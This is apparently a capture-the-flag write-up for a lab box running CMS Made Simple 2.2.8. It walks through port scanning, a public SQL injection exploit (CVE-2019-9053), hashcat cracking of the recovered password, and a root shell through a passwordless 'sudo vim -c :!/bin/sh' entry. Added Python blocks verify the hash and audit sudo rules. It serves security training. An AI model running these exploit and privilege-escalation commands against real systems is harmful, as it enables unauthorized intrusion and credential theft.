RECON:
neo@0xneoxploit:~$ rustscan -a 10.10.160.152 --ulimit 5000 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.
[~] The config file is expected to be at "/home/neo/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.160.152:21
Open 10.10.160.152:80
Open 10.10.160.152:2222
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -sV" on ip 10.10.160.152
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-28 05:09 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
Initiating Ping Scan at 05:09
Scanning 10.10.160.152 [4 ports]
Completed Ping Scan at 05:09, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:09
Completed Parallel DNS resolution of 1 host. at 05:09, 0.12s elapsed
DNS resolution of 1 IPs took 0.12s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 05:09
Scanning 10.10.160.152 [3 ports]
Discovered open port 21/tcp on 10.10.160.152
Discovered open port 80/tcp on 10.10.160.152
Discovered open port 2222/tcp on 10.10.160.152
Completed SYN Stealth Scan at 05:09, 0.19s elapsed (3 total ports)
Initiating Service scan at 05:09
Scanning 3 services on 10.10.160.152
Completed Service scan at 05:09, 6.36s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.160.152.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:09
NSE: [ftp-bounce 10.10.160.152:21] PORT response: 500 Illegal PORT command.
NSE Timing: About 99.77% done; ETC: 05:09 (0:00:00 remaining)
Completed NSE at 05:09, 30.97s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 1.15s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
Nmap scan report for 10.10.160.152
Host is up, received echo-reply ttl 63 (0.16s latency).
Scanned at 2025-02-28 05:09:11 EST for 38s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.96.143
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCj5RwZ5K4QU12jUD81IxGPdEmWFigjRwFNM2pVBCiIPWiMb+R82pdw5dQPFY0JjjicSysFN3pl8ea2L8acocd/7zWke6ce50tpHaDs8OdBYLfpkh+OzAsDwVWSslgKQ7rbi/ck1FF1LIgY7UQdo5FWiTMap7vFnsT/WHL3HcG5Q+el4glnO4xfMMvbRar5WZd4N0ZmcwORyXrEKvulWTOBLcoMGui95Xy7XKCkvpS9RCpJgsuNZ/oau9cdRs0gDoDLTW4S7OI9Nl5obm433k+7YwFeoLnuZnCzegEhgq/bpMo+fXTb/4ILI5bJHJQItH2Ae26iMhJjlFsMqQw0FzLf
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM6Q8K/lDR5QuGRzgfrQSDPYBEBcJ+/2YolisuiGuNIF+1FPOweJy9esTtstZkG3LPhwRDggCp4BP+Gmc92I3eY=
| 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2I73yryK/Q6UFyvBBMUJEfznlIdBXfnrEqQ3lWdymK
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:09
Completed NSE at 05:09, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.31 seconds
Raw packets sent: 7 (284B) | Rcvd: 4 (160B)
So we can see three ports are open: FTP (21), HTTP (80) and SSH (2222). On port 80 we don't see anything interesting other than the default Apache server page, so let's find some hidden directories:
┌──(neo㉿0xneoxploit)-[~]
└─$ gobuster dir -u http://10.10.160.152/ -w /usr/share/dirb/wordlists/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.160.152/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 297]
/.htpasswd (Status: 403) [Size: 297]
/robots.txt (Status: 200) [Size: 929]
/server-status (Status: 403) [Size: 301]
/simple (Status: 301) [Size: 315] [--> http://10.10.160.152/simple/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
So let's try /simple.
It's running a website on CMS Made Simple version 2.2.8.
Let's search Exploit-DB:
┌──(neo㉿0xneoxploit)-[~]
└─$ searchsploit CMS Made Simple 2.2.8
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(neo㉿0xneoxploit)-[~]
└─$ searchsploit -x php/webapps/46635.py
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
Codes: CVE-2019-9053
Verified: False
File Type: Python script, ASCII text executable
So we have a SQL injection exploit to use here. Let's run it:
┌──(neo㉿0xneoxploit)-[~/Tools/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit]
└─$ python /usr/share/exploitdb/exploits/php/webapps/46635.py
File "/usr/share/exploitdb/exploits/php/webapps/46635.py", line 25
print "[+] Specify an url target"
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?
So yeah, I had to swim through GitHub to find another one: https://github.com/ELIZEUOPAIN/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit
This worked for me:
┌──(neo㉿0xneoxploit)-[~/Tools/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit]
└─$ python cve.py -u http://10.10.160.152/simple -w /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
Let's crack it using hashcat, mode 20 (md5($salt.$pass)), with hash.txt holding the hash and salt as hash:salt:
┌──(neo㉿0xneoxploit)-[~]
└─$ hashcat -m 20 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.6) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: cpu--0x000, 1435/2935 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 2 secs
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 20 (md5($salt.$pass))
Hash.Target......: 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2
Time.Started.....: Fri Feb 28 06:27:50 2025, (0 secs)
Time.Estimated...: Fri Feb 28 06:27:50 2025, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 11094 H/s (0.13ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1024/14344384 (0.01%)
Rejected.........: 0/1024 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> bethany
Hardware.Mon.#1..: Util: 25%
Started: Fri Feb 28 06:27:27 2025
Stopped: Fri Feb 28 06:27:52 2025
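To see exactly what hashcat mode 20 computed above, here is an added Python check (not from the original writeup) that recomputes md5($salt.$pass) for the salt and hash the exploit returned and confirms the recovered candidate; it also shows that the other common order, md5($pass.$salt), does not match, which is why the mode choice matters. The mini wordlist is constructed.

```python
import hashlib
import hmac

# Values the SQL injection step on this page returned: site salt and stored hash.
SALT = "1dac0d92e9fa6bb2"
STORED_HASH = "0c01f4468bd75d7a84c7eb73846e8d96"


def salt_then_pass(salt: str, password: str) -> str:
    """hashcat mode 20, md5($salt.$pass): the salt is prepended to the password."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def pass_then_salt(salt: str, password: str) -> str:
    """hashcat mode 10, md5($pass.$salt): the other common order. Included to show
    that the right wordlist with the wrong mode recovers nothing."""
    return hashlib.md5((password + salt).encode()).hexdigest()


def matches(salt: str, stored_hash: str, candidate: str) -> bool:
    """Constant-time comparison of the recomputed digest against the stored one."""
    return hmac.compare_digest(salt_then_pass(salt, candidate), stored_hash)


def first_match(salt: str, stored_hash: str, candidates):
    """Return the first candidate whose md5($salt.$pass) equals the stored hash,
    or None. This is all that hashcat -m 20 -a 0 does, minus the speed."""
    for candidate in candidates:
        if matches(salt, stored_hash, candidate):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed mini wordlist standing in for rockyou.txt.
    wordlist = ["123456", "password", "letmein", "secret", "bethany"]
    print("recovered:", first_match(SALT, STORED_HASH, wordlist))
    print("mode 10 would match:", pass_then_salt(SALT, "secret") == STORED_HASH)
```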
So log in over SSH (port 2222) using this username and password and get user.txt.
ROOT
I ran linpeas.sh and found this:
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
Explanation of vim -c ':!/bin/sh'
This command exploits the fact that you can run shell commands from within Vim, and since Vim is being executed with sudo, it inherits root privileges.
Breakdown of the Command:
- vim → This launches the Vim text editor.
- -c → This tells Vim to execute a command as soon as it starts.
- ':!/bin/sh'
  • : → Enters Vim command mode.
  • ! → Tells Vim to execute an external shell command.
  • /bin/sh → Launches a shell (which in this case will run as root, because Vim was executed with sudo).
What Happens?
• Since sudo vim is allowed without a password, you can run Vim as root.
• The -c ':!/bin/sh' forces Vim to immediately execute /bin/sh as root.
• You are now in a root shell (#).
Verify Root Access:
whoami
Expected output:
root
Alternative for a Fully Interactive Shell:
If you need a fully interactive TTY shell, after spawning /bin/sh, you can run:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Now you have a stable root shell. 🚀
Now cat /root/root.txt.
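As an added defender-side check that is not part of the original writeup: a small Python audit that parses `sudo -l` output like the linpeas finding above and flags root-level entries for binaries that can spawn a shell from inside. The list of shell-capable binaries is an assumption to extend per environment, and the sample lines other than the vim entry are constructed.

```python
import os
import re

# Assumed list of programs that can run arbitrary commands from inside
# (editors, pagers, interpreters, find/awk). Extend it for your environment.
SHELL_CAPABLE = {
    "vim", "vi", "nvim", "nano", "less", "more", "man", "find", "awk", "gawk",
    "python", "python3", "perl", "ruby", "bash", "sh", "env", "tar", "zip",
}

# Matches privilege lines as printed by `sudo -l`, e.g.
#     (root) NOPASSWD: /usr/bin/vim
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$"
)

# Constructed sample: the first entry is the one linpeas reported on this box.
SAMPLE = """\
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart apache2
    (www-data) NOPASSWD: /usr/bin/find
"""


def parse_sudo_l(output: str):
    """Yield (runas, nopasswd, command) for each privilege line in `sudo -l` output."""
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags").upper()
        yield m.group("runas").strip(), nopasswd, m.group("cmd").strip()


def risky_entries(output: str):
    """Return (program, nopasswd) for entries that reach root through a
    shell-capable binary. A bare ALL is flagged whether or not a password is needed."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(output):
        if "root" not in runas and "ALL" not in runas:
            continue  # cannot become root through this entry
        for token in cmd.split(","):
            prog = token.strip().split(" ")[0]
            if prog == "ALL" or os.path.basename(prog) in SHELL_CAPABLE:
                findings.append((prog, nopasswd))
    return findings


if __name__ == "__main__":
    for prog, nopasswd in risky_entries(SAMPLE):
        print(f"risky sudo entry: {prog} (NOPASSWD={nopasswd})")
```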